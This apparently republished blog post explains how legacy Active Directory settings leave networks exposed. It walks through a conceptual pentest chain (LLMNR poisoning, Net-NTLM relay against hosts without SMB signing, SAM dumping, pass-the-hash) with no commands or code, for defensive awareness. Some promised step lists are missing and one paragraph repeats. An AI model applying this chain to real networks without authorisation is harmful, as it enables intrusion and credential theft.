Posted by Marbenz Antonio on August 24, 2022
Over the past twenty years, a sinister problem has been slowly growing under the security experts’ and IT administrators’ noses. Businesses were more reliant on insecure technology installed within their internal network stack as they developed to satisfy the technological needs of the early 2000s.
Although security has developed to patch known vulnerabilities, many businesses have been unable to apply released patches because of a reliance on legacy technology. 90% of all on-premise Active Directory deployments examined by X-Force Red in 2022 alone were found to be vulnerable to attacks because of the presence of these older technologies. Additionally, the complexity of enterprise networks has increased dramatically, creating a vast environment of incorrect setups. In our X-Force Threat Intelligence Index 2022, we noted that a large number of assaults make use of these misconfigurations.
Organizations have been concentrating on enhancing their perimeter security for decades under the presumption that it was possible to prevent attackers from accessing their networks. However, we can assure you as hackers that there is always a way in. Always. Additionally, corporations are quickly switching to new solutions, so this isn’t news. Implementing tactics like zero trust is a significant component of these new solutions; according to our analysis of the cost of a data breach in 2022, 41% of enterprises have already adopted its tenets. Organizations must examine their decades of technical debt as they look forward to new strategies and solutions.
A network’s complexity rises exponentially along with the number of devices it contains. Scalable access management and device aggregation solutions exist because it is extremely difficult to maintain control and effective oversight over a large number of systems. Windows Active Directory (AD), which enables network administrators to manage devices, credentials, users, and their permissions from a single location, is the most popular solution to this efficient administration and access control challenge. Growing AD environments have a challenge that makes it difficult to manage, analyze, and visualize user security relationships at scale, which results in the limited visibility of user permissions within the domain. And that only applies to one domain. Growing AD environments have a challenge that makes it difficult to manage, analyze, and visualize user security relationships at scale, which results in the limited visibility of user permissions within the domain. And that only applies to one domain.
These challenges with permits transparency become more pronounced in larger organizations when you can have a forest made up of many domains (or even an environment with multiple forests). In the early 2000s, as networks developed, problems with manually changed setup grew in number. Organizations discovered themselves burdened with a stack of unused and forgotten permits as time went on and the individuals in charge of these environments left their positions. Current network administrators are having trouble identifying and managing that stack. And manage they must, for the overhanging shadow of decades of dismantled configuration debt lingers in the deepest recesses of today’s networks.
In the late 1990s and early 2000s, security was not a top priority. As a result, security problems concern the gadgets and communication protocols created in this period. Although many of these issues have been addressed with modern technology, organizations based their operational procedures on these outdated models, leading to a sustained reliance on legacy hardware and communication standards.
Businesses sometimes prioritize maintaining current operations above implementing new technology, particularly when the latter can cause disruptions or downtime. While it’s true that many IT administrators would prefer to retire obsolete equipment, they usually are unable to do so because of various levels of dependency inside their company. Even if it’s less often, some people are complacent and fail to see the necessity of replacing an effective but obsolete piece of software. Vendors changed their products to by default support legacy communications protocols like Link-Local Multicast Name Resolution (LLMNR), Net-NTLMv1, and SMB signature disabled. This was done in response to the desire for compatibility. As a result, some networks are still exposed to some threats that were addressed more than ten years ago.
Let’s take a moment to discuss Active Directory’s significance. In the majority of enterprises, Active Directory serves as the primary management tool for virtually all Windows devices as well as numerous Linux systems. Any Active Directory administrator, therefore, has total authority over all linked systems.
Realizing this, threat actors, red teams, and phishing emails usually concentrate on compromising Active Directory systems because doing so will give them total control of an organization’s IT infrastructure.
The concentration on compatibility by default has led to modern Windows computers running susceptible services that can lead to a complete compromise of an Active Directory environment, although Windows has been gaining an increasing number of new capabilities that assist harden Windows environments.
Although the Windows operating system has been the target of several attacks recently, many breaches can be ascribed to outdated attack methods rather than cutting-edge vulnerability research. Most Windows networks are still susceptible to assaults that have been around for more than 20 years. Let’s go over a sample attack vector inside a business network to illustrate these problems.
Let’s put ourselves in the position of an average pentester to establish the scene. You’ve just been thrown onto a new network and given the task of conducting an internal penetration test. A subnet containing the desktop computers of hundreds of users contains your jump-box. You survey your surroundings, conduct an environmental reconnaissance, and identify every Windows-powered system. The logical next step for you is to launch an attack using coercion to force authentication.
LLMNR, Multicast DNS (mDNS), and NetBIOS Name Service are the three broadcast-level name resolution technologies that Windows utilizes by default (NBT-NS). If you’re not familiar with the idea of broadcast-level name resolution, imagine someone shouting to everyone nearby on the street, “Where is this store? In this case, anyone in the crowd may provide the correct address in response to the person’s request, or a bad actor could do so and point them in the direction of a pop-up store that had been disguised to resemble the site they had originally requested. Without realizing it, the consumer could visit the fake storefront and provide the bad guys with their credit card information.
Similar to this, when a computer uses a broadcast-level name resolution protocol to resolve a name to an address, hackers can react to the request and reroute the device to their machine, which could lead to the system automatically submitting the attacker’s credentials. Technically speaking, the assault operates as follows:
We must first examine a high-level overview of Net-operation NTLMs before we can comprehend what can be done with these recently acquired credentials. As a challenge-response authentication protocol, Net-NTLM asks the client a question for which the server already knows the answer; if the client responds correctly, they are authorized. In this situation, the question is if it is possible to encrypt, then hash, a set of random numbers using the user’s login information as the encryption key. The steps involved in this process are as follows:
Now that we have a better understanding of Net-NTLM. Let’s explore what we can accomplish with the credentials we previously intercepted. The password’s complexity makes a password cracking assault one possibility, but it might not succeed. Despite your best efforts, we have intercepted a Net-NTLM authentication hash, not an NT hash, hence transmitting this hash is not possible. A Net-NTLM relay attack is one of this protocol’s native vulnerabilities. Threat actors are able to force authentication and then relay each request to a target as it happens. If successful, if that person has local administrator permissions, it might lead to a threat actor obtaining immediate control over a machine.
To comprehend what a Net-NTLM relay assault is, let’s continue with our prior illustration. When our victim asked where a store was, the assailant overheard her and skillfully led the unsuspecting customer to their false shop. In this instance, the victim makes a payment using their cell phone, which creates a special, time-limited code that may be used to take money out of the account just once. The attacker uses the victim’s account to make a single purchase after relaying the generated code during checkout.
Similarly, a Net-NTLM relay attack operates. The victim had to authenticate to our device when we first coerced login. Instead, we may have directed their login process to a different device, which would have recognized the login attempt as coming from the attacker.
Microsoft introduced SMB signature in Windows Server 2000, more than 20 years ago, to defend against Net-NTLM relay and other man-in-the-middle vulnerabilities. By including this feature, the Net-NTLM authentication protocol helped to prevent message modification while in transit to the server. Theoretically, this attack vector ought to have been neutralized a long time ago. In reality, all Windows versions aside from the Windows server do not by default enable SMB signing. Because of this, the majority of businesses are not aware that the operating system they use by default is susceptible to a 20-year-old assault.
Let’s continue with our hypothetical situation by going back to your analysis of the recon phase data, which shows that the majority of hosts do not have SMB signing enabled. You launch your authentication coercion assaults using this information. Any coerced credentials are then transmitted to a tool that is set up to relay them to the exposed servers. You relay a user with local administrator rights over a device after three minutes of operation.
Lack of credential hygiene on corporate networks is one of the most important problems that the IBM X-Force Red internal penetration testing team has encountered over the years. Dumping the local SAM database is one of the most popular ways to migrate laterally inside a network after compromising a device. All local account password hashes, including those for the local administrator, are stored in this database. Once this credential has been obtained, the administrator username and password can be spread throughout the environment via passing the hash. It’s likely to cause lateral or horizontal movement inside the domain.
In our example, you accessed a system with local administrator rights before dumping the SAM database there. By leaking these credentials, you discovered that a domain controller shared the local administrator password, giving you immediate access to the environment.
Actors that pose a threat now are more proficient than ever at navigating networks. Organizations need to move away from convenience but insecurity by default for defenders to have a greater chance of thwarting incoming threats. Executives must have a thorough understanding of the risks associated with decades of unresolved technical debt, and IT administrators must be trained on how to ensure that useless services are disabled within their operating systems. Instead of merely accepting the danger posed by outdated technology, considerable investment needs to be made in new prospects that encourage programmers to produce original, secure versions of legacy code that can be quickly deployed while also reducing the possibility of disruptions.
Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.
For more information, please get in touch with one of our course advisers today or contact us at email@example.com